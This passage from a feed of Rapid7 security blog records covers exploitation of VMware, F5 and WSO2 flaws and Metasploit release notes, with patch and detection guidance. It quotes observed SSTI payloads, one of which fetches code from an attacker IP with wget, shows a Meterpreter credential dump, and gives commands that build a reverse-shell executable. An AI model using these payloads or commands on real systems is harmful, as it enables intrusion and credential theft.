1, 2022:** Teleconference with Baxter and Rapid7 presenting findings\n * **Jun-Jul 2022: **Several follow up conversations and updates between Baxter and Rapid7\n * **Tue, Aug 2, 2022:** Coordination tracking over [VINCE](<https://www.kb.cert.org/vince/>) and more teleconferencing involving Baxter, Rapid7, CERT/CC, and [ICS-CERT](<https://www.cisa.gov/uscert/ics/advisories>) (VU#142423)\n * **Wed, Aug 31, 2022: **Final review of findings and mitigations\n * **Thu Sep 8, 2022:** Baxter advisory [published](<https://www.baxter.com/product-security#additionalresources>)\n * **Thu, Sep 8, 2022:** Public disclosure of these issues\n * **Thu, Sep 8, 2022:** ICS-CERT [advisory published](<https://www.cisa.gov/uscert/ics/advisories/icsma-22-251-01>)\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Rapid7 Discovered Vulnerabilities in Cisco ASA, ASDM, and FirePOWER Services Software](<https://www.rapid7.com/blog/post/2022/08/11/rapid7-discovered-vulnerabilities-in-cisco-asa-asdm-and-firepower-services-software/>)_\n * _[CVE-2022-31660 and CVE-2022-31661 (FIXED): VMware Workspace ONE Access, Identity Manager, and vRealize Automation LPE](<https://www.rapid7.com/blog/post/2022/08/05/cve-2022-31660-and-cve-2022-31661-fixed-vmware-workspace-one-access-identity-manager-and-vrealize-automation-lpe/>)_\n * _[QNAP Poisoned XML Command Injection (Silently Patched)](<https://www.rapid7.com/blog/post/2022/08/04/qnap-poisoned-xml-command-injection-silently-patched/>)_\n * _[Primary Arms PII Disclosure via IDOR (FIXED)](<https://www.rapid7.com/blog/post/2022/08/02/primary-arms-pii-disclosure-via-idor/>)_", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 8.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.2}, "published": "2022-09-08T16:30:00", "type": "rapid7blog", "title": "Baxter SIGMA Spectrum Infusion Pumps: Multiple Vulnerabilities (FIXED)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26390", "CVE-2022-26392", "CVE-2022-26393", "CVE-2022-26394", "CVE-2022-31660", "CVE-2022-31661"], "modified": "2022-09-08T16:30:00", "id": "RAPID7BLOG:4D69504143872C1DF22DEB73BA90A6BD", "href": "https://blog.rapid7.com/2022/09/08/baxter-sigma-spectrum-infusion-pumps-multiple-vulnerabilities-fixed/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-05-02T22:54:37", "description": "\n\nOn April 6, 2022, VMware published [VMSA-2022-0011](<https://www.vmware.com/security/advisories/VMSA-2022-0011.html>), which detailed multiple security vulnerabilities. The most severe of these is [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>), a critical remote code execution vulnerability affecting VMware\u2019s Workspace ONE Access and Identity Manager solutions. The vulnerability arises from a server-side template injection flaw and has a CVSSv3 base score of 9.8. Successful exploitation allows an unauthenticated attacker with network access to the web interface to execute an arbitrary shell command as the VMware user.\n\nRapid7's vulnerability research team has a [full analysis of CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>) in AttackerKB, including chaining the vulnerability with CVE-2022-22960 to escalate to `root.`\n\nAffected products:\n\n * VMware Workspace ONE Access (Access) 20.10.0.0 - 20.10.0.1, 21.08.0.0 - 21.08.0.1\n * VMware Identity Manager (vIDM) 3.3.3 - 3.3.6\n\nVMware updated their advisory to note active exploitation in the wild on April 12, 2022; a day later, security news outlet Bleeping Computer [indicated](<https://www.bleepingcomputer.com/news/security/hackers-exploit-critical-vmware-cve-2022-22954-bug-patch-now/>) that several public proof-of-concept exploits were being used in the wild to drop coin miners on vulnerable systems. More recently, security firm Morphisec [published analysis](<https://blog.morphisec.com/vmware-identity-manager-attack-backdoor>) of attacks that exploited CVE-2022-22954 to deploy reverse HTTPS backdoors. Public proof-of-concept exploit code is available and [fits in a tweet](<https://twitter.com/wvuuuuuuuuuuuuu/status/1519476924757778433>) (credit to researchers [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>) and [Udhaya Prakash](<https://twitter.com/sherlocksecure>)).\n\nRapid7\u2019s Project Heisenberg detected scanning/exploitation activity on 2022-04-13 and again on 2022-04-22. A total of 14 requests were observed across ports 80, 98, 443, 4443.\n\n\n\nScanning/exploitation strings observed:\n\n * `/catalog-portal/ui/oauth/verify`\n * `/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"cat /etc/hosts\")}`\n * `/catalog-portal/ui/oauth/verify?error=&deviceUdid=${\"freemarker.template.utility.Execute\"?new()(\"wget -U \"Hello 1.0\" -qO - http://106[.]246[.]224[.]219/one\")}`\n\nAttacker IP addresses: \n`103[.]42[.]196[.]67` \n`5[.]157[.]38[.]50` \n`54[.]38[.]103[.]1` (NOTE: according to [this French government website](<https://blog.rapid7.com/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/%E2%80%8B%E2%80%8Bhttps://cert.ssi.gouv.fr/scans/>), this IP address is benign) \n`94[.]74[.]123[.]228` \n`96[.]243[.]27[.]61` \n`107[.]174[.]218[.]172` \n`170[.]210[.]45[.]163` \n`173[.]212[.]229[.]216`\n\nThese nodes appear to be members of generic botnets. Rapid7\u2019s Heisenberg network has observed many of them involved in the same campaigns as noted in the above graphic, as well as [Log4Shell](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell/rapid7-analysis?referrer=blog>) exploitation attempts.\n\n## Mitigation guidance\n\nVMware customers should patch their Workspace ONE Access and Identity Manager installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions [here](<https://kb.vmware.com/s/article/88099>) on patching and applying [workarounds](<https://kb.vmware.com/s/article/88098>). VMware has an FAQ available on this advisory [here](<https://core.vmware.com/vmsa-2022-0011-questions-answers-faq>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-22954 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/vmsa-2022-0011-cve-2022-22954/>) for Unix-like systems. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.)\n\nInsightIDR customers have a new detection rule added to their library to identify attacks related to this vulnerability. We recommend that you review your settings for this detection rule and confirm it is turned on and [set to an appropriate rule action and priority for your organization](<https://docs.rapid7.com/insightidr/modify-detection-rules>):\n\n * Suspicious Process - VMware Workspace ONE Access Launches Process\n\nFor our MDR service customers, Rapid7 detection logic is continuously reviewed to ensure detections are based on any observed attacker behavior seen by our Incident Response (IR), Managed Detection and Response (MDR), and Threat Intelligence and Detection Engineering (TIDE) teams. Through continuous collaboration and threat landscape monitoring, we ensure product coverage for the latest techniques being used by malicious actors and will make updates as necessary. The MDR team will notify you if suspicious activity is detected in your environment.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-29T13:25:42", "type": "rapid7blog", "title": "Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2022-22954", "CVE-2022-22960"], "modified": "2022-04-29T13:25:42", "id": "RAPID7BLOG:2FC92FBE5A4445611C80C7C3FA7D9354", "href": "https://blog.rapid7.com/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-06T19:31:54", "description": "## VMware Workspace ONE Access RCE\n\n\n\nCommunity contributor [wvu](<https://twitter.com/wvuuuuuuuuuuuuu>) has developed a new Metasploit Module which exploits [CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>), an unauthenticated server-side template injection (SSTI) in VMware Workspace ONE Access, to execute shell commands as the \u2018horizon\u2019 user. This module has a CVSSv3 base score of 9.8, and a full technical analysis can be found on the official [Rapid7 Analysis](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>)\n\n## WSO2 Arbitrary File Upload to RCE\n\nOur very own [Jack Hysel](<https://github.com/jheysel-r7>) has contributed a new module for [CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>). Multiple WSO2 products are vulnerable to an unrestricted file upload vulnerability that results in RCE. This module builds a `java/meterpreter/reverse_tcp` payload inside a WAR file and uploads it to the target via the vulnerable file upload. It then executes the payload to open a session. A full technical analysis can be found on the official [Rapid7 Analysis](<https://attackerkb.com/topics/zO1gNHJgcZ/cve-2022-29464/rapid7-analysis?referrer=blog>)\n\n## Kiwi Meterpreter Updates - Windows 11 Support\n\nThe Meterpreter Kiwi extension has been updated to pull in the latest changes from the upstream [mimikatz project](<https://github.com/gentilkiwi/mimikatz>). Notably this adds support for Windows 11 when running the `creds_all` command within a Meterpreter console:\n \n \n meterpreter > getsystem\n ...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).\n meterpreter > getuid\n Server username: NT AUTHORITY\\SYSTEM\n meterpreter > load kiwi\n Loading extension kiwi\u2026\n .#####. mimikatz 2.2.0 20191125 (x64/windows)\n .## ^ ##. \"A La Vie, A L'Amour\" - (oe.eo)\n ## / \\ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )\n ## \\ / ## > http://blog.gentilkiwi.com/mimikatz\n '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )\n '#####' > http://pingcastle.com / http://mysmartlogon.com ***/\n Success.\n meterpreter > sysinfo\n Computer : WIN11-TEST\n OS : Windows 10 (10.0 Build 22000).\n Architecture : x64\n System Language : en_US\n Domain : TESTINGDOMAIN\n Logged On Users : 11\n Meterpreter : x64/windows\n meterpreter > creds_all\n [+] Running as SYSTEM\n [*] Retrieving all credentials\n msv credentials\n ===============\n \n Username Domain NTLM SHA1\n -------- ------ ---- ----\n WIN11-TEST$ TESTINGDOMAIN a133becebb8e22321dbf26bf8d90f398 dbf0ad587f62004306f435903fb3a516da6ba104\n ... etc etc ...\n \n\n## New module content (3)\n\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>) \\- This adds an exploit for CVE-2022-22954 which is an unauthenticated RCE in VMWare Workspace ONE Access.\n * [WSO2 Arbitrary File Upload to RCE](<https://github.com/rapid7/metasploit-framework/pull/16507>) by wvu, Jack Heysel, Orange Tsai, and hakivvi, which exploits [CVE-2022-29464](<https://attackerkb.com/topics/zO1gNHJgcZ/cve-2022-29464?referrer=blog>) \\- This adds an exploit for CVE-2022-29464 which is an arbitrary file upload vulnerability in multiple WSO2 products that can be used to obtain remote code execution.\n * [ZoneMinder Language Settings Remote Code Execution](<https://github.com/rapid7/metasploit-framework/pull/16514>) by krastanoel, which exploits [CVE-2022-29806](<https://attackerkb.com/topics/UExWSYmybq/cve-2022-29806?referrer=blog>) \\- This leverages a directory traversal and arbitrary file write in vulnerable versions of ZoneMinder to achieve remote code execution as the `www-data` user.\n\n## Enhancements and features (2)\n\n * [#16445](<https://github.com/rapid7/metasploit-framework/pull/16445>) from [dwelch-r7](<https://github.com/dwelch-r7>) \\- The Windows Meterpreter payload now supports a `MeterpreterDebugLogging` datastore option for logging debug information to a file. Example usage:\n \n \n use windows/x64/meterpreter_reverse_tcp\n set MeterpreterDebugBuild true\n set MeterpreterDebugLogging rpath:C:/test/foo.txt\n save\n generate -f exe -o shell.exe\n to_handler\n \n\n * [#16462](<https://github.com/rapid7/metasploit-framework/pull/16462>) from [bcoles](<https://github.com/bcoles>) \\- Adds support for armle/aarch64 architectures to `gdb_server_exec`\n\n## Bugs fixed (2)\n\n * [#16526](<https://github.com/rapid7/metasploit-framework/pull/16526>) from [jheysel-r7](<https://github.com/jheysel-r7>) \\- The version of Meterpreter Payloads has been upgraded to pull in a fix that will ensure that the Kiwi extension can now work properly on Windows 11 hosts and correctly dump credentials vs failing silently as it was doing previously.\n * [#16530](<https://github.com/rapid7/metasploit-framework/pull/16530>) from [sjanusz-r7](<https://github.com/sjanusz-r7>) \\- This updates the `pihole_remove_commands_lpe` module to no longer break sessions when running the check method.\n\n## Get it\n\nAs always, you can update to the latest Metasploit Framework with `msfupdate` \nand you can get more details on the changes since the last blog post from \nGitHub:\n\n * [Pull Requests 6.1.40...6.1.41](<https://github.com/rapid7/metasploit-framework/pulls?q=is:pr+merged:%222022-04-28T13%3A01%3A56%2B02%3A00..2022-05-05T11%3A16%3A04-05%3A00%22>)\n * [Full diff 6.1.40...6.1.41](<https://github.com/rapid7/metasploit-framework/compare/6.1.40...6.1.41>)\n\nIf you are a `git` user, you can clone the [Metasploit Framework repo](<https://github.com/rapid7/metasploit-framework>) (master branch) for the latest. \nTo install fresh without using git, you can use the open-source-only [Nightly Installers](<https://github.com/rapid7/metasploit-framework/wiki/Nightly-Installers>) or the \n[binary installers](<https://www.rapid7.com/products/metasploit/download.jsp>) (which also include the commercial edition).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-06T17:56:15", "type": "rapid7blog", "title": "Metasploit Wrap-Up", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-29464", "CVE-2022-29806"], "modified": "2022-05-06T17:56:15", "id": "RAPID7BLOG:1ECBAB52CD82AE516E383F64D607FEF9", "href": "https://blog.rapid7.com/2022/05/06/metasploit-wrap-up-154/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-20T21:31:04", "description": "\n\nOn May 18, 2022, VMware published [VMSA-2022-0014](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>) on CVE-2022-22972 and CVE-2022-22973. The more severe of the two vulnerabilities is CVE-2022-22972, a critical authentication bypass affecting VMware\u2019s Workspace ONE Access, Identity Manager, and vRealize Automation solutions. The vulnerability allows attackers with network access to the UI to obtain administrative access without the need to authenticate. CVE-2022-22972 may be chained with CVE-2022-22973 to bypass authentication and obtain root access. A full list of affected products is available in [VMware\u2019s advisory](<https://www.vmware.com/security/advisories/VMSA-2022-0014.html>).\n\nAt time of writing, there is no public proof of concept for CVE-2022-22972, and there have been no reports of exploitation in the wild. We expect this to change quickly, however, since Rapid7 researchers have seen [similar VMware vulnerabilities](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954/rapid7-analysis?referrer=blog>) come under attack quickly in recent weeks. In April 2022, we [published details on CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>), a server-side template injection flaw that was widely exploited by threat actors targeting internet-facing VMware Workspace ONE and Identity Manager applications.\n\nIn conjunction with VMware\u2019s advisory on May 18, the US Cybersecurity and Infrastructure Agency (CISA) published [Emergency Directive 22-03](<https://www.cisa.gov/emergency-directive-22-03>) in response to VMSA-2022-0014. The directive requires all \u201cFederal Civilian Executive Branch\u201d agencies to either apply the patch or remove affected VMware installations from agency networks by May 24, 2022. CISA also released an [additional alert](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>) emphasizing that threat actors are known to be chaining recent VMware vulnerabilities \u2014 CVE-2022-22954 and CVE-2022-22960 \u2014 to gain full control of vulnerable systems. CISA\u2019s alert notes that the new vulnerabilities in VMSA-2022-0014 are likely to be exploited in the wild quickly:\n\n> Due to the [likely] rapid exploitation of these vulnerabilities, CISA strongly encourages all organizations with affected VMware products that are accessible from the internet \u2014 that did not immediately apply updates \u2014 to assume compromise.\n\n## Mitigation guidance\n\nVMware customers should patch their Workspace ONE Access, Identity Manager, and vRealize Automation installations immediately, without waiting for a regular patch cycle to occur. VMware has instructions [here](<https://kb.vmware.com/s/article/88438>) on patching and applying [workarounds](<https://kb.vmware.com/s/article/88098>).\n\nAdditionally, if your installation is internet-facing, consider taking steps to remove direct access from the internet. It may also be prudent to follow CISA\u2019s guidance on post-exploitation detection methods found in [Alert (AA22-138B)](<https://www.cisa.gov/uscert/ncas/alerts/aa22-138b>).\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers will be able to assess their VMware Workspace ONE Access and Identity Manager systems\u2019 exposure to CVE-2022-22972 and CVE-2022-22973 with authenticated vulnerability checks for Unix-like systems available in the May 20, 2022 content release. (Note that VMware Workspace ONE Access is only able to be deployed on Linux from 20.x onward.) Additional vulnerability coverage will be evaluated as the need arises.\n\n_Note: The original version of this blog post indicated that Rapid7 VM customers could expect coverage in the May 19 content release. Due to unforeseen complications with detecting VMware's hotfix patch, there was a delay and the checks will be available in the May 20 content release._\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-19T13:54:07", "type": "rapid7blog", "title": "CVE-2022-22972: Critical Authentication Bypass in VMware Workspace ONE Access, Identity Manager, and vRealize Automation", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22954", "CVE-2022-22960", "CVE-2022-22972", "CVE-2022-22973"], "modified": "2022-05-19T13:54:07", "id": "RAPID7BLOG:A84DC7A15FD5A2A6BF1C8389827A8B0D", "href": "https://blog.rapid7.com/2022/05/19/cve-2022-22972-critical-authentication-bypass-in-vmware-workspace-one-access-identity-manager-and-vrealize-automation/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T19:31:05", "description": "\n\nOn May 4, 2022, F5 released [an advisory](<https://support.f5.com/csp/article/K55879220>) listing several vulnerabilities, including [CVE-2022-1388](<https://support.f5.com/csp/article/K23605346>), a critical authentication bypass that leads to remote code execution in iControl REST with a CVSSv3 base score of 9.8.\n\nThe vulnerability affects several different versions of BIG-IP prior to 17.0.0, including:\n\n * F5 BIG-IP 16.1.0 - 16.1.2 (patched in 16.1.2.2)\n * F5 BIG-IP 15.1.0 - 15.1.5 (patched in 15.1.5.1)\n * F5 BIG-IP 14.1.0 - 14.1.4 (patched in 14.1.4.6)\n * F5 BIG-IP 13.1.0 - 13.1.4 (patched in 13.1.5)\n * F5 BIG-IP 12.1.0 - 12.1.6 (no patch available, will not fix)\n * F5 BIG-IP 11.6.1 - 11.6.5 (no patch available, will not fix)\n\nOn Monday, May 9, 2022, [Horizon3](<https://www.horizon3.ai/>) released a [full proof of concept](<https://github.com/horizon3ai/CVE-2022-1388>), which we successfully executed to get a root shell. Other groups have [developed exploits](<https://www.bleepingcomputer.com/news/security/exploits-created-for-critical-f5-big-ip-flaw-install-patch-immediately/>) as well.\n\nOver the past few days, [BinaryEdge](<https://www.binaryedge.io/>) has detected an increase in [scanning and exploitation](<https://twitter.com/Balgan/status/1523683322446381059>) for F5 BIG-IP. Others on Twitter have also [observed exploitation attempts](<https://twitter.com/1ZRR4H/status/1523572874061422593>). Due to the ease of exploiting this vulnerability, the public exploit code, and the fact that it provides root access, exploitation attempts are likely to increase.\n\nWidespread exploitation is somewhat mitigated by the small number of internet-facing F5 BIG-IP devices, however; our best guess is that there are only [about 2,500 targets on the internet](<https://twitter.com/Junior_Baines/status/1522205355287228416>).\n\n## Mitigation guidance\n\nF5 customers should patch their BIG-IP devices as quickly as possible using [F5's upgrade instructions](<https://support.f5.com/csp/article/K84205182>). Additionally, the management port for F5 BIG-IP devices (and any similar appliance) should be tightly controlled at the network level \u2014 only authorized users should be able to reach the management interface at all.\n\nF5 also [provides a workaround as part of their advisory](<https://support.f5.com/csp/article/K23605346>). If patching and network segmentation are not possible, the workaround should prevent exploitation. We always advise patching rather than relying solely on workarounds.\n\nExploit attempts appear in at least [two different log files](<https://twitter.com/n0x08/status/1523701663290122240>):\n\n * /var/log/audit\n * /var/log/restjavad-audit.0.log\n\nBecause this vulnerability is a root compromise, successful exploitation may be very difficult to recover from. At a minimum, affected BIG-IP devices should be rebuilt from scratch, and certificates and passwords should be rotated.\n\n## Rapid7 customers\n\nInsightVM and Nexpose customers can assess their exposure to CVE-2022-1388 with an authenticated [vulnerability check](<https://www.rapid7.com/db/vulnerabilities/f5-big-ip-cve-2022-1388/>) in the May 5, 2022 content release. This release also includes authenticated vulnerability checks for additional CVEs in F5's [May 2022 security advisory](<https://support.f5.com/csp/article/K55879220>).\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe\n\n \n\n\n_**Additional reading:**_\n\n * _[Widespread Exploitation of VMware Workspace ONE Access CVE-2022-22954](<https://www.rapid7.com/blog/post/2022/04/29/widespread-exploitation-of-vmware-workspace-one-access-cve-2022-22954/>)_\n * _[Opportunistic Exploitation of WSO2 CVE-2022-29464](<https://www.rapid7.com/blog/post/2022/04/22/opportunistic-exploitation-of-wso2-cve-2022-29464/>)_\n * _[Spring4Shell: Zero-Day Vulnerability in Spring Framework (CVE-2022-22965)](<https://www.rapid7.com/blog/post/2022/03/30/spring4shell-zero-day-vulnerability-in-spring-framework/>)_\n * _[CVE-2022-0847: Arbitrary File Overwrite Vulnerability in Linux Kernel](<https://www.rapid7.com/blog/post/2022/03/09/cve-2022-0847-arbitrary-file-overwrite-vulnerability-in-linux-kernel/>)_", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-05-09T17:57:00", "type": "rapid7blog", "title": "Active Exploitation of F5 BIG-IP iControl REST CVE-2022-1388", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-0847", "CVE-2022-1388", "CVE-2022-22954", "CVE-2022-22965", "CVE-2022-29464"], "modified": "2022-05-09T17:57:00", "id": "RAPID7BLOG:07CA09B4E3B3835E096AA56546C43E8E", "href": "https://blog.rapid7.com/2022/05/09/active-exploitation-of-f5-big-ip-icontrol-rest-cve-2022-1388/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-09T17:36:33", "description": "\n\nMetasploit 6.2.0 has been released, marking another milestone that includes new modules, features, improvements, and bug fixes. Since Metasploit 6.1.0 (August 2021) until the latest Metasploit 6.2.0 release we\u2019ve added:\n\n * 138 new modules\n * 148 enhancements and features\n * 156 bug fixes\n\n## Top modules\n\nEach week, the Metasploit team publishes a [Metasploit wrap-up](<https://www.rapid7.com/blog/tag/metasploit-weekly-wrapup/>) with granular release notes for new Metasploit modules. Below is a list of some recent modules that pen testers have told us they are actively using on engagements (with success).\n\n**Remote Exploitation**\n\n * [VMware vCenter Server Unauthenticated JNDI Injection RCE (via Log4Shell)](<https://github.com/rapid7/metasploit-framework/pull/16050>) by RageLtMan, Spencer McIntyre, jbaines-r7, and w3bd3vil, which exploits [CVE-2021-44228](<https://attackerkb.com/topics/in9sPR2Bzt/cve-2021-44228-log4shell?referrer=blog>): A vCenter-specific exploit leveraging the Log4Shell vulnerability to achieve unauthenticated RCE as `root` / `SYSTEM`. This exploit has been tested on both Windows and Linux targets.\n * [F5 BIG-IP iControl RCE via REST Authentication Bypass](<https://github.com/rapid7/metasploit-framework/pull/16549>) by Heyder Andrade, James Horseman, Ron Bowes, and alt3kx, which exploits [CVE-2022-1388](<https://attackerkb.com/topics/SN5WCzYO7W/cve-2022-1388?referrer=blog>): This module targets CVE-2022-1388, a vulnerability impacting F5 BIG-IP versions prior to 16.1.2.2. By making a special request, an attacker can bypass iControl REST authentication and gain access to administrative functionality. This can be used by unauthenticated attackers to execute arbitrary commands as the `root` user on affected systems.\n * [VMware Workspace ONE Access CVE-2022-22954](<https://github.com/rapid7/metasploit-framework/pull/16512>) by wvu, Udhaya Prakash, and mr_me, which exploits [CVE-2022-22954](<https://attackerkb.com/topics/BDXyTqY1ld/cve-2022-22954?referrer=blog>): This module exploits an unauthenticated remote code execution flaw in VMWare Workspace ONE Access installations; the vulnerability is being used broadly in the wild.\n * [Zyxel Firewall ZTP Unauthenticated Command Injection](<https://github.com/rapid7/metasploit-framework/pull/16563>) by jbaines-r7, which exploits [CVE-2022-30525](<https://attackerkb.com/topics/LbcysnvxO2/cve-2022-30525?referrer=blog>): This module targets CVE-2022-30525, an unauthenticated remote command injection vulnerability affecting Zyxel firewalls with zero touch provisioning (ZTP) support. Successful exploitation results in remote code execution as the `nobody` user. The vulnerability was [discovered](<https://www.rapid7.com/blog/post/2022/05/12/cve-2022-30525-fixed-zyxel-firewall-unauthenticated-remote-command-injection/>) by Rapid7 researcher [Jake Baines](<https://github.com/jbaines-r7>).\n\n**Local Privilege Escalation**\n\n * [CVE-2022-21999 SpoolFool Privesc](<https://github.com/rapid7/metasploit-framework/pull/16344>) by Oliver Lyak and Shelby Pace, which exploits [CVE-2022-21999](<https://attackerkb.com/topics/vFYqO85asS/cve-2022-21999?referrer=blog>): A local privilege escalation targeting the spool service on Windows 10 or Server builds 18362 or earlier.\n * [Dirty Pipe Local Privilege Escalation via CVE-2022-0847](<https://github.com/rapid7/metasploit-framework/pull/16303>) by Max Kellermann and timwr, which exploits [CVE-2022-0847](<https://attackerkb.com/topics/UwW7SVPaPv/cve-2022-0847?referrer=blog>): A module targeting a privilege escalation vulnerability in the Linux kernel starting with version 5.8. The module leverages the vulnerability to overwrite a SUID binary in order to gain privileges as the `root` user.\n\n## Capture plugin\n\nCapturing credentials is a critical and early phase in the playbook of many offensive security testers. Metasploit has facilitated this for years with protocol-specific modules all under the `auxiliary/server/capture` namespace. Users can start and configure each of these modules individually, but as of MSF 6.2.0, [a new capture 